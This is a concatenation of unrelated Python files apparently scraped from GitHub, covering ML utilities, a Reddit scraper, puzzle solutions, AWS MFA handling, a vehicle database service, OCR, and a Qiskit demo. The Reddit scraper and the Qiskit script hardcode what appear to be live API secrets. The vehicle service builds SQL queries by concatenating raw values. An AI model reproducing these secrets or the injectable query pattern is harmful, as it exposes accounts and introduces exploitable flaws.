tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\r\n\r\ndata_augmentation_flip_rotate = tf.keras.Sequential([\r\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal_and_vertical\"),\r\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2)])\r\n\r\ndata_scaling_resizing = tf.keras.Sequential([\r\n tf.keras.layers.experimental.preprocessing.Resizing(512, 512),\r\n tf.keras.layers.experimental.preprocessing.Rescaling(1. / 255)])\r\n\r\nearly_stop = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)\r\n\r\nmonitor_func = tf.keras.callbacks.ModelCheckpoint(model_name, monitor='val_loss',\r\n verbose=0, save_best_only=True,\r\n save_weights_only=True, mode='min')\r\n\r\n\r\n# Learning rate schedule\r\ndef scheduler(epoch, lr):\r\n if epoch % 10 == 0:\r\n lr = lr / 2\r\n return lr\r\n\r\n\r\nlr_schedule = tf.keras.callbacks.LearningRateScheduler(scheduler, verbose=0)\r\n\r\n\r\n# ------- THE FUNCTIONS BELOW WILL NoT be USED IN THIS PROJECT ------- #\r\n# ------- They Did not work with our dataset\r\n\r\n\r\n# Shuffle indexes of given dataset and labels\r\ndef shuffle_indexes(X, Y):\r\n import numpy as np\r\n indexes = np.arange(X.shape[0], dtype=int)\r\n np.random.shuffle(indexes)\r\n X_new = X[indexes]\r\n Y_new = Y[indexes]\r\n return X_new, Y_new\r\n\r\n\r\n# Splitting the given dataset (dataset_X, dataset_Y) into two portions\r\n# dataset_X is the data values and dataset_Y are the corresponding labels\r\n# (X_LG, Y_LG) will have the first {percent*100}% of the dataset and\r\n# (X_SM, Y_SM) will have the last {1 - percent}*100% of the dataset\r\ndef split_dataset(dataset_X, dataset_Y, percent):\r\n # Calculate splitting index\r\n nsplit = int(percent * dataset_X.shape[0])\r\n\r\n # split dataset into\r\n X_LG = dataset_X[:nsplit]\r\n Y_LG = dataset_Y[:nsplit]\r\n X_SM = dataset_X[nsplit:]\r\n Y_SM = dataset_Y[nsplit:]\r\n return X_LG, Y_LG, X_SM, Y_SM\r\n\r\n\r\n# Returns One Hot Encoding for given train, validate and test dataset labels or None\r\ndef one_hot_encoding(train=None, validate=None, test=None):\r\n train_oh = None\r\n validate_oh = None\r\n test_oh = None\r\n if train is not None:\r\n train_oh = tf.keras.utils.to_categorical(train)\r\n if validate is not None:\r\n validate_oh = tf.keras.utils.to_categorical(validate)\r\n if test is not None:\r\n test_oh = tf.keras.utils.to_categorical(test)\r\n return train_oh, validate_oh, test_oh\r\n\r\n\r\n# returns normalized dataset values\r\n# norm_type = 0 -> min-max; norm_type = 1 -> standardization\r\ndef normalise_data(train, val, test, norm_type=0):\r\n if norm_type == 0:\r\n X_train = train / 255\r\n X_val = val / 255\r\n X_test = test / 255\r\n else:\r\n train_mean, train_std = train.mean(), train.std()\r\n X_train = (train - train_mean) / train_std\r\n X_val = (val - train_mean) / train_std\r\n X_test = (test - train_mean) / train_std\r\n return X_train, X_val, X_test\r\n\r\n\r\n# Resize Images from TFDS Dataset\r\ndef resize_dataset(img, label):\r\n img = tf.image.resize(img, (512, 512))\r\n return img, label\r\n\r\n\r\n# Extract Images and Labels in Dataset\r\ndef feature_extraction(ds):\r\n img = []\r\n lbl = []\r\n for i in ds:\r\n img.append(i[0])\r\n lbl.append(i[1])\r\n return img, lbl\r\n\r\n\r\n# Normalizes Images in Dataset using min-max method\r\ndef dataset_normalization_min_max(img, lbl):\r\n img = img / 255\r\n return img, lbl\r\n\r\n\r\n# Normalizes Images in Dataset using Standardization method\r\ndef dataset_normalization_std(img, lbl):\r\n mean, std = 
img.mean(), img.std()\r\n img = (img - mean) / std\r\n return img, lbl\r\n\r\n\r\n# Augment Images in Dataset using random flip method\r\ndef dataset_augmentation_flip(img, lbl):\r\n return tf.image.random_flip_left_right(img), lbl\r\n\r\n\r\n# Augment Images in Dataset using random contrast method\r\ndef dataset_augmentation_contrast(img, lbl):\r\n return tf.image.random_contrast(img, lower=0.0, upper=1.0), lbl\r\n","repo_name":"rsbaher1/ENEL645_Project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14377884140","text":"\n\nimport praw\nimport json\n\n# Reddit API Credentials\nclient_id = 'm94LTsIrdVY19IZENHTKqg'\nclient_secret = 'ODRb0IOHJzubnQZTKWnIomj90OG-8g'\nuser_agent = 'app:v1.0 (by /u/cagierboot)'\n\n# Setup Reddit Client\nreddit = praw.Reddit(client_id=client_id, client_secret=client_secret, user_agent=user_agent)\n\n# Subreddit to fetch data from\nsubreddit_name = \"worldnews\"\n\n# Store all posts with their top comments\nall_posts_data = []\n\ntop_posts = reddit.subreddit(subreddit_name).hot(limit=100)\nfor post in top_posts:\n # Ensure the post has been loaded correctly\n post.comment_sort = 'top'\n post.comments.replace_more(limit=0) # Load all top-level comments, replace \"more comments\" links\n top_comment = post.comments[0].body if post.comments else \"No comments available.\"\n\n post_info = {\n 'prompt': f\"{post.title}\",\n 'completion': f\"\\n{top_comment}\\n\",\n 'system_message': \"You are an AI bot that is trained on world news current events and can perform analyses on this data you are training on.\"\n}\n\n all_posts_data.append(post_info)\n\n# Writing data to a JSON file\nwith open('top_posts_with_comments.json', 'w', encoding='utf-8') as f:\n json.dump(all_posts_data, f, ensure_ascii=False, indent=4)\n\nprint(\"Top posts with their top comments have been saved to 'top_posts_with_comments.json'\")\n","repo_name":"cagierboot/zeitgeistdreams","sub_path":"trendExtract.py","file_name":"trendExtract.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20055145280","text":"T = int(input())\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef dfs(x, y, dig):\n global answer\n\n for r in range(4):\n nx = x + dx[r]\n ny = y + dy[r]\n if 0 <= nx < N and 0 <= ny < N:\n if not visited[nx][ny]:\n if data[x][y] > data[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n dfs(nx, ny, dig)\n visited[nx][ny] = 0\n\n elif dig:\n if data[x][y] > data[nx][ny] - K:\n temp = data[nx][ny]\n data[nx][ny] = data[x][y] - 1\n visited[nx][ny] = visited[x][y] + 1\n dfs(nx, ny, False)\n visited[nx][ny] = 0\n data[nx][ny] = temp\n\n if answer < visited[x][y]:\n answer = visited[x][y]\n\n\nfor tc in range(1, T + 1):\n N, K = map(int, input().split())\n data = [list(map(int, input().split())) for _ in range(N)]\n max_val = max(sum(data, []))\n peaks = []\n for row in range(N):\n for col in range(N):\n if data[row][col] == max_val:\n peaks.append([row, col])\n\n answer = 0\n for peak in peaks:\n x, y = peak\n visited = [[0 for _ in range(N)] for _ in range(N)]\n visited[x][y] = 1\n dfs(x, y, True)\n\n print('#{} {}'.format(tc, 
answer))","repo_name":"swsilver95/TIL","sub_path":"algorithm/SWEA/SWEA1949_등산로조성_Ad.py","file_name":"SWEA1949_등산로조성_Ad.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44259065815","text":"import datetime\nimport logging\nimport os\nimport sys\n\nimport boto\nimport boto.s3\nimport boto.exception\n\nfrom boto.sts import STSConnection\n\nlogger = logging.getLogger('botomfa')\nstdout_handler = logging.StreamHandler(stream=sys.stdout)\nstdout_handler.setFormatter(\n    logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nstdout_handler.setLevel(logging.DEBUG)\nlogger.addHandler(stdout_handler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef get_sts(duration, mfa_serial, mfa_device_name,\n            long_term, short_term, assume_role_arn=None):\n    if boto.config.get(long_term, 'aws_access_key_id') is None:\n        logger.error('aws_access_key_id is missing from section %s '\n                     'or config file is missing.' % (long_term,))\n        sys.exit(1)\n    else:\n        long_term_id = boto.config.get(long_term, 'aws_access_key_id')\n\n    if boto.config.get(long_term, 'aws_secret_access_key') is None:\n        logger.error('aws_secret_access_key is missing from section %s '\n                     'or config file is missing.' % (long_term,))\n        sys.exit(1)\n    else:\n        long_term_secret = boto.config.get(long_term, 'aws_secret_access_key')\n\n    if boto.config.has_section(short_term):\n        boto.config.remove_option(short_term, 'aws_security_token')\n\n    mfa_TOTP = raw_input('Enter AWS MFA code for user %s '\n                         '(renewing for %s seconds):' %\n                         (mfa_device_name, duration))\n    try:\n        sts_connection = STSConnection(aws_access_key_id=long_term_id,\n                                       aws_secret_access_key=long_term_secret)\n        if assume_role_arn is None:\n            tempCredentials = sts_connection.get_session_token(\n                duration=duration,\n                mfa_serial_number=mfa_serial,\n                mfa_token=mfa_TOTP)\n            assumed_role = 'False'\n        else:\n            role_session_name = assume_role_arn.split('/')[-1]\n            assumedRole = sts_connection.assume_role(\n                assume_role_arn, role_session_name,\n                duration_seconds=duration,\n                mfa_serial_number=mfa_serial,\n                mfa_token=mfa_TOTP)\n            tempCredentials = assumedRole.credentials\n            assumed_role = 'True'\n\n        default_options = [\n            ('aws_access_key_id', tempCredentials.access_key),\n            ('aws_secret_access_key', tempCredentials.secret_key),\n            ('aws_security_token', tempCredentials.session_token),\n            ('expiration', tempCredentials.expiration),\n            ('assumed_role', assumed_role)\n        ]\n\n        for option, value in default_options:\n            boto.config.save_user_option(\n                short_term,\n                option,\n                value\n            )\n\n    except boto.exception.BotoServerError as e:\n        message = '%s - Please try again.' % (e.message)\n        logger.error(message)\n        sys.exit(1)\n\n\ndef test_creds(profile_name):\n    try:\n        logger.info('Validating temporary credentials..')\n        if boto.config.getbool(profile_name, 'assumed_role'):\n            logger.info('You are currently using the credentials of an '\n                        'AssumedRole. Use the --clear flag to clear these '\n                        'credentials')\n        expiration_string = boto.config.get(profile_name, 'expiration')\n        if expiration_string is None:\n            logger.error('Expiration timestamp missing from temporary '\n                         'credentials.')\n            return False\n        exp_dt = datetime.datetime.strptime(\n            expiration_string, '%Y-%m-%dT%H:%M:%SZ'\n        )\n        t_diff = exp_dt - datetime.datetime.utcnow()\n        if t_diff.total_seconds() <= 0:\n            logger.warn('Your temporary credentials have expired. '\n                        'Attempting to renew...')\n            return False\n\n        # Validate against a real service. 
This may not be the best solution\n        # for everyone, as the person attempting to fetch an STS token may\n        # now have access to S3. This might need to be more flexible or we\n        # could potentially ditch this altogether?\n        s3 = boto.connect_s3()\n        s3.get_all_buckets()\n\n        logger.info(\n            'Temporary credentials validation successful! '\n            'Token expires in %s seconds at %s' %\n            (t_diff.seconds, expiration_string)\n        )\n        return True\n    except:\n        logger.warn('Temporary credentials are invalid.')\n        return False\n\n\ndef run(duration, aws_account_num, mfa_device_name, profile,\n        assume_role_arn=None):\n    # If no profile specified, use default\n    if profile is None:\n        logger.debug('Using default profile.')\n        long_term_profile = 'long-term'\n        short_term_profile = 'Credentials'\n    else:\n        logger.debug('Using profile: %s' % profile)\n        long_term_profile = '%s-%s' % (profile, 'long-term')\n        short_term_profile = profile\n\n    # Get AWS account number. Needed to build MFA serial\n    if aws_account_num is None:\n        logger.error('AWS Account number must be set either via '\n                     'AWS_ACT_NUM environment variable '\n                     'or --aws-acct-num.')\n        sys.exit(1)\n\n    # If your MFA device is named something other than your\n    # shell's username, it can be provided via MFA_USER\n    mfa_device_name = (mfa_device_name or\n                       os.environ.get('USER'))\n    if mfa_device_name is None:\n        logger.error('Could not retrieve MFA device name from environment '\n                     'variables MFA_DEVICE_NAME or USER.')\n        sys.exit(1)\n\n    mfa_serial = 'arn:aws:iam::%s:mfa/%s' % (aws_account_num, mfa_device_name)\n\n    logger.debug('Your AWS account number is: %s' % aws_account_num)\n    logger.debug('Your MFA device name is: %s' % mfa_device_name)\n    if assume_role_arn:\n        logger.debug('You are assuming the role: %s' % assume_role_arn)\n\n    # if any of the section named fields are missing, prompt for token\n    if (\n        boto.config.get(short_term_profile, 'aws_access_key_id') is None or\n        boto.config.get(short_term_profile, 'aws_secret_access_key') is None or\n        boto.config.get(short_term_profile, 'aws_security_token') is None\n    ):\n        logger.info(\n            'Temporary credentials are missing, obtaining them.')\n        get_sts(duration, mfa_serial,\n                mfa_device_name, long_term_profile,\n                short_term_profile, assume_role_arn)\n\n    if not test_creds(short_term_profile):\n        get_sts(duration, mfa_serial,\n                mfa_device_name, long_term_profile,\n                short_term_profile, assume_role_arn)\n        test_creds(short_term_profile)\n\n\ndef reset_credentials(profile=None):\n    short_term_profile = 'Credentials'\n    if profile is not None:\n        short_term_profile = profile\n\n    if boto.config.has_section(short_term_profile):\n        options = ['aws_access_key_id', 'aws_secret_access_key',\n                   'aws_security_token', 'expiration', 'assumed_role']\n        for option in options:\n            boto.config.save_user_option(short_term_profile, option, '')\n","repo_name":"broamski/botomfa","sub_path":"botomfa.py","file_name":"botomfa.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
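The next record (comments translated from Portuguese) builds every SQL statement by string concatenation, which invites injection and quoting bugs. With a DB-API driver such as psycopg2 — an assumption, since the record only shows an opaque `db` connection object — the same insert is safer with bound parameters; a minimal editorial sketch:

    # Hypothetical rewrite of the record's cadastrar() using bound parameters.
    # Assumes `db` is a psycopg2-style DB-API connection, as the record implies.
    def cadastrar(db, veiculo):
        sql = ("INSERT INTO veiculos (codigoCliente, placa, marca, modelo) "
               "VALUES (%s, %s, %s, %s)")
        with db.cursor() as cursor:
            # the driver quotes and escapes each bound value itself
            cursor.execute(sql, (veiculo.codigoCliente, veiculo.placa,
                                 veiculo.marca, veiculo.modelo))
        db.commit()
        return veiculo

Binding values also removes the need for the record's manual str() conversions and quote splicing.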
cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n\ndef cadastrar(veiculo):\n #Montando comando SQL\n comandoSQL = \"insert into \"\n comandoSQL += nome_tabela\n comandoSQL += \"(\"\n comandoSQL += \"codigoCliente,\" \\\n \"placa,\" \\\n \"marca,\" \\\n \"modelo\" \n comandoSQL +=\") values (\"\n comandoSQL += \"'\"+str(veiculo.codigoCliente)+\"',\" \\\n \"'\" + str(veiculo.placa) + \"',\" \\\n \"'\" + str(veiculo.marca) + \"',\" \\\n \"'\"+str(veiculo.modelo)+\"'\"\n comandoSQL += \");\"\n\n #Executando comando no banco de dados\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n\n return veiculo\n\ndef editar(codigo, veiculo):\n #Montando comando SQL\n comandoSQL = \"UPDATE \"\n comandoSQL += nome_tabela\n comandoSQL += \" SET \"\n comandoSQL += \"marca = '\"+ str(veiculo.marca) +\"', \" \\\n \"codigoCliente = '\"+str(veiculo.codigoChefe)+\"',\" \\\n \"placa = '\" + str(veiculo.placa) + \"',\" \\\n \"modelo = '\"+str(veiculo.modelo)+\"'\"\n comandoSQL += \" where codigo='\"+str(codigo)+\"';\"\n\n #Executando comando no banco de dados\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n return veiculo\n\ndef getAll():\n comandoSQL = \"SELECT * FROM \"+nome_tabela+\";\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n lista = []\n data_manager = cursor.fetchone()\n if data_manager is None:\n return None\n while data_manager is not None:\n lista.append(veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4]))\n data_manager = cursor.fetchone()\n\n return lista\n\ndef get(id):\n comandoSQL = \"SELECT * from \"+nome_tabela+\" where codigo='\"+str(id)+\"';\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n data_manager = cursor.fetchone()\n if data_manager:\n return veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4])\n else:\n return None\n\ndef get_ultimo():\n comandoSQL = \"SELECT * from \"+nome_tabela+\" ORDER BY codigo DESC limit 1;\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n data_manager = cursor.fetchone()\n if data_manager:\n return veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4])\n else:\n return None","repo_name":"VictorFreitasKing/HefestoPBD","sub_path":"api/services/veiculos_service.py","file_name":"veiculos_service.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10790435515","text":"# Time: O(logn)\n# Space: O(1)\n\nclass Solution(object):\n def singleNonDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n left, right = 0, len(nums)-1\n while left <= right:\n mid = left + (right - left) / 2\n if not (mid%2 == 0 and mid+1 < len(nums) and \\\n nums[mid] == nums[mid+1]) and \\\n not (mid%2 == 1 and nums[mid] == nums[mid-1]):\n right = mid-1\n else:\n left = mid+1\n return nums[left]\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/single-element-in-a-sorted-array.py","file_name":"single-element-in-a-sorted-array.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"27750527900","text":"def solution(food):\n answer = ''\n start = []\n end = []\n \n for i in range(1,len(food)):\n 
amount = food[i]\n \n if amount==1:\n continue\n start.append((i,amount//2))\n end.append((i,amount//2))\n end.reverse()\n \n while start or end:\n if start:\n num,count = start.pop(0)\n for i in range(count):\n answer+=str(num)\n if len(start)==0:\n answer+=str(0)\n else:\n num,count = end.pop(0)\n for i in range(count):\n answer+=str(num)\n \n return answer","repo_name":"khj1998/ProblemSolving","sub_path":"프로그래머스/unrated/134240. 푸드 파이트 대회/푸드 파이트 대회.py","file_name":"푸드 파이트 대회.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74044075321","text":"import os\n\ndef get_data_years_from_mass(suiteid, runid, ens, search, dir_final):\n '''\n Extract the track data from MASS\n '''\n if ens == '':\n moodir = 'moose:/crum/'+suiteid+'/any.nc.file/'\n else:\n moodir = 'moose:/ens/'+suiteid+'/'+ens+'/any.nc.file/'\n cmd = 'moo ls '+moodir+search+' | head -1 | cut -d _ -f 4 | cut -c 1-4'\n print(cmd)\n sts=subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, check=True)\n year_start = sts.stdout\n cmd = 'moo ls '+moodir+search+' | tail -1 | cut -d _ -f 4 | cut -c 1-4'\n print(cmd)\n sts=subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, check=True)\n year_end = sts.stdout\n return int(year_start), int(year_end)\n\ndef get_data_from_mass(suiteid, runid, ens, search, dir_final):\n '''\n Extract the track data from MASS\n '''\n if ens == '':\n moo_path = 'moose:/crum/'+suiteid+'/any.nc.file/'+search\n else:\n moo_path = 'moose:/ens/'+suiteid+'/'+ens+'/any.nc.file/'+search\n cmd = 'moo get -i '+moo_path+' '+dir_final\n print(cmd)\n os.system(cmd)\n\ndef work(suiteid, runid, ens, runid_info, algo, algo_type, expt, key, resol, track_method, dir_in, years, institute, rip, grid, fileformat='nc', filepattern=''):\n '''\n For a given file name format, and directory\n Get tracks from MASS archive\n '''\n\n if filepattern == '':\n filepattern = \"TC_{year}_{resol}_u-{runid}.{track_type}.{hemi}{track_m}.tracks\"\n dir_track = dir_in\n if not os.path.exists(dir_track):\n os.makedirs(dir_track)\n\n algo_search = algo\n\n if track_method == 'T42':\n track_m = ''\n elif track_method == 'T63':\n track_m = '.T63'\n elif track_method == 'T63full':\n track_m = '.T63full'\n elif track_method == 'T42new':\n track_m = ''\n else:\n track_m = ''\n track_type = runid_info['track_type']\n\n fname = filepattern.format(runid=runid, resol=resol, year='*', track_type=track_type, hemi='*', track_m=track_m, hemipos='*', algo_type=algo_type)\n\n if years == []:\n year_start, year_end = get_data_years_from_mass(suiteid, runid, ens, search, dir_track)\n years = np.arange(year_start, year_end+1)\n else:\n year_start = years[0]\n year_end = years[-1]\n\n print('get years ',years)\n for year in years:\n if year > year_end:\n continue\n if year < year_start:\n continue\n print('do year ',year)\n fname = filepattern.format(runid=runid, resol=resol, year=year, track_type=track_type, hemi='*', track_m=track_m, hemipos='*', algo_type=algo_type)\n search_fname = os.path.join(dir_track, fname)\n print ('search_fname ',search_fname)\n if not os.path.exists(search_fname):\n get_data_from_mass(suiteid, runid, ens, fname, 
dir_track)\n\n","repo_name":"eerie-project/storm_track_analysis","sub_path":"assess/load_data/get_tracks_from_mass.py","file_name":"get_tracks_from_mass.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"614065990","text":"# %%\nfrom __future__ import annotations\n\nimport os\n\nimport cv2\nimport matplotlib_inline\nimport numpy as np\nimport pytesseract\nfrom matplotlib import pyplot as plt\nfrom src import ocr\nmatplotlib_inline.backend_inline.set_matplotlib_formats('svg')\n\n# %%\nimg_inicial_path = './Codigos/Letra Preta/Cod (13).jpg'\nimg_inicial = cv2.imread(img_inicial_path)\nVALOR_T = 170 # Quanto mais clara a imagem, maior deve ser esse valor (Max - 255)\n\n# %%\n\n\ndef show(img_path, title):\n dpi = 60\n img_data = plt.imread(img_path)\n if len(img_data.shape) == 3:\n height, width, depth = img_data.shape\n else:\n height, width = img_data.shape\n\n # What size does the figure need to be in inches to fit the image?\n figsize = width / float(dpi), height / float(dpi)\n\n # Create a figure of the right size with one axes that takes up the full figure\n fig = plt.figure(figsize=figsize)\n ax = fig.add_axes([0, 0, 1, 1])\n\n # Hide spines, ticks, etc.\n ax.axis('off')\n\n # Display the image.\n ax.imshow(img_data, cmap='gray')\n\n plt.title(title)\n plt.show()\n\n\n# %%\ndef display(img, img_name):\n img_path = f'./Resultado/img_{img_name}.png'\n\n cv2.imwrite(img_path, img)\n\n show(img_path, f'Imagem {img_name}')\n\n\n# %%\ndisplay(img_inicial, 'RGB')\n\n# %%\nscale_percent = 220 # percent of original size\nwidth = int(img_inicial.shape[1] * scale_percent / 100)\nheight = int(img_inicial.shape[0] * scale_percent / 100)\ndim = (width, height)\n\n# resize image\nimg_resized = cv2.resize(img_inicial, dim, interpolation=cv2.INTER_LINEAR)\n\ndisplay(img_resized, 'Resized')\n\n\n# %% -------------------------Trasforma imagem em escala de cinza-----------------------\nimg_gray = cv2.cvtColor(img_resized, cv2.COLOR_BGR2GRAY)\n\ndisplay(img_gray, 'Grey')\n\n\n# %% ----------------------------------Inverte imagem-----------------------------------\nimg_invert = cv2.bitwise_not(img_gray)\n\ndisplay(img_invert, 'Invertida')\n\n\n# %% -------------------------Binarização da imagem-------------------------------------\nthresh = VALOR_T\nimg_binarizada = cv2.threshold(img_gray, thresh, 255, cv2.THRESH_BINARY)[1] # Usada para imagens com letra branca\n# img_binarizada = cv2.threshold(img_invert, thresh, 255, cv2.THRESH_BINARY)[1] # Usada para imagens de letra preta\n\n\n# # %% -----------------Dilatação e Erosão(Para tirar borda do dígito)--------------------\n# element_estr = cv2.getStructuringElement(cv2.MORPH_CROSS, (2, 2))\n# img_dilatada = cv2.dilate(img_binarizada, element_estr, iterations=1)\n\n# display(img_dilatada, \"Dilatada\")\n\n\n# # %% -----------------Dilatação e Erosão(Para tirar borda do dígito)--------------------\n# element_estr = cv2.getStructuringElement(cv2.MORPH_CROSS, (2, 2))\n# img_erodida = cv2.erode(img_dilatada, element_estr, iterations=1)\n\n# display(img_erodida, \"Erodida\")\n\n\n# %% -------------------------Imegem Final------------------------\nimg_final = img_binarizada\ndisplay(img_inicial, 'Inicial')\ndisplay(img_final, 'Final')\n\n\n# %% -----------------------------------Ativa o OCR na imagem---------------------------\n# config = r'--psm 6 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 load_freq_dawg=false 
load_system_dawg=false'\n# pytesseract.image_to_string('./Resultado/ImagemNova.jpg', config=config)\n\n\n# %%\nprint(ocr.find_code_in_image(img_final))\n\n\n# %%\n","repo_name":"viniam/self-development","sub_path":"python/computacional_vision/exercicio/exercicio.py","file_name":"exercicio.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19264817906","text":"# superposition_state.py\nimport sys\nimport os\nimport time\n\n# import qiskit from qiskit-sdk-py folder\ntry:\n sys.path.append(os.path.join(os.path.dirname(__file__), '../../', 'qiskit-sdk-py'))\n import Qconfig\n qx_config = {\n \"APItoken\": Qconfig.APItoken,\n \"url\": Qconfig.config['url']}\nexcept:\n qx_config = {\n \"APItoken\":\"da2a4002660558a35103a600bcbda7fe438cea629a6be98969ea5e367c091b6815e624bd86b6207121bd97fef79c22033318a4402eeafcbd04b021fd80f5a195\",\n \"url\":\"https://quantumexperience.ng.bluemix.net/api\"\n }\n\nfrom qiskit import ClassicalRegister, QuantumRegister, QuantumCircuit, execute\n\n# Define the Classical and Quantum Regiaters\nc = ClassicalRegister(1)\nq = QuantumRegister(1)\n\n# Build the circuit\nsuperposition_state = QuantumCircuit(q, c)\n\n# Define the superposition state given by Hadamard gate on a QuantumRegister\nsuperposition_state.h(q)\n\n# Measure the superpostion state\nsuperposition_state.measure(q, c)\n\n# Execute the circuit\njob = execute(superposition_state, backend = 'local_qasm_simulator', shots=4096)\nresult = job.result()\n\n# Print the result\nprint(result.get_counts(superposition_state))","repo_name":"oimichiu/quantumGateModel","sub_path":"IBMQX/qiskit-tutorials/coduriCareNUcompileaza/tutoriale-QISKit/01-getting_started/superposition_state.py","file_name":"superposition_state.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30626401518","text":"\"\"\"\r\n1. 
Here the bot receives the directions from user to move.\r\n2.It quit the game when it cross the boundaries or touch itself\r\n\"\"\"\r\nfrom turtle import*\r\nfrom freegames import square,vector\r\nfrom random import randrange\r\nimport turtle\r\n\r\negg=vector(0,0)\r\nsnake=[vector(-10,0)]\r\naim=vector(0,-10)\r\n\r\ndef target(x,y):\r\n aim.x=x\r\n aim.y=y\r\n \r\n'''\r\nthis method refer boundaries\r\n'''\r\ndef border(head): \r\n return -150(.*?)\", html, re.DOTALL)\n if len(match) > 0:\n return match[0]\n raise Exception(\"ISBN not found\")\n","repo_name":"Calysto/calysto","sub_path":"calysto/util/ottobib.py","file_name":"ottobib.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"73468252279","text":"class Solution(object):\n def targetIndices(self, nums, target):\n sorted_nums = sorted(nums)\n target_indeces = []\n \n for indx in range(len(nums)):\n if sorted_nums[indx] == target:\n target_indeces.append(indx)\n \n return target_indeces","repo_name":"Ketema741/Competitive-programming-group4","sub_path":"2089-find-target-indices-after-sorting-array/2089-find-target-indices-after-sorting-array.py","file_name":"2089-find-target-indices-after-sorting-array.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"38600029578","text":"import re\nfrom difflib import SequenceMatcher\n\nimport codecs\nimport os\nfrom collections import Counter\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom text_unidecode import unidecode\nfrom tqdm.notebook import tqdm\n\ndef replace_encoding_with_utf8(error: UnicodeError) -> Tuple[bytes, int]:\n return error.object[error.start : error.end].encode(\"utf-8\"), error.end\n\n\ndef replace_decoding_with_cp1252(error: UnicodeError) -> Tuple[str, int]:\n return error.object[error.start : error.end].decode(\"cp1252\"), error.end\n\n\n# Register the encoding and decoding error handlers for `utf-8` and `cp1252`.\ncodecs.register_error(\"replace_encoding_with_utf8\", replace_encoding_with_utf8)\ncodecs.register_error(\"replace_decoding_with_cp1252\", replace_decoding_with_cp1252)\n\n\n\ndef resolve_encodings_and_normalize(text: str) -> str:\n \"\"\"Resolve the encoding problems and normalize the abnormal characters.\"\"\"\n text = (\n text.encode(\"raw_unicode_escape\")\n .decode(\"utf-8\", errors=\"replace_decoding_with_cp1252\")\n .encode(\"cp1252\", errors=\"replace_encoding_with_utf8\")\n .decode(\"utf-8\", errors=\"replace_decoding_with_cp1252\")\n )\n text = unidecode(text)\n return text\n\n\ndef clean_text(text):\n text = text.replace(u'\\x9d', u' ')\n text = resolve_encodings_and_normalize(text)\n # text = text.replace(u'\\xa0', u' ')\n # text = text.replace(u'\\x85', u'\\n')\n text = text.strip()\n return text\n\ndef add_text_to_df(test_df,data_folder):\n mapper = {}\n for idx in tqdm(test_df.essay_id.unique()):\n with open(data_folder/f'{idx}.txt','r') as f:\n texte = clean_text(f.read())\n # texte = resolve_encodings_and_normalize(f.read())\n # texte = texte.strip() \n mapper[idx] = texte\n\n test_df['discourse_ids'] = np.arange(len(test_df))\n test_df['essay_text'] = test_df['essay_id'].map(mapper)\n test_df['discourse_text'] = test_df['discourse_text'].transform(clean_text)\n test_df['discourse_text'] = test_df['discourse_text'].str.strip()\n\n test_df['previous_discourse_end'] = 0\n test_df['st_ed'] = 
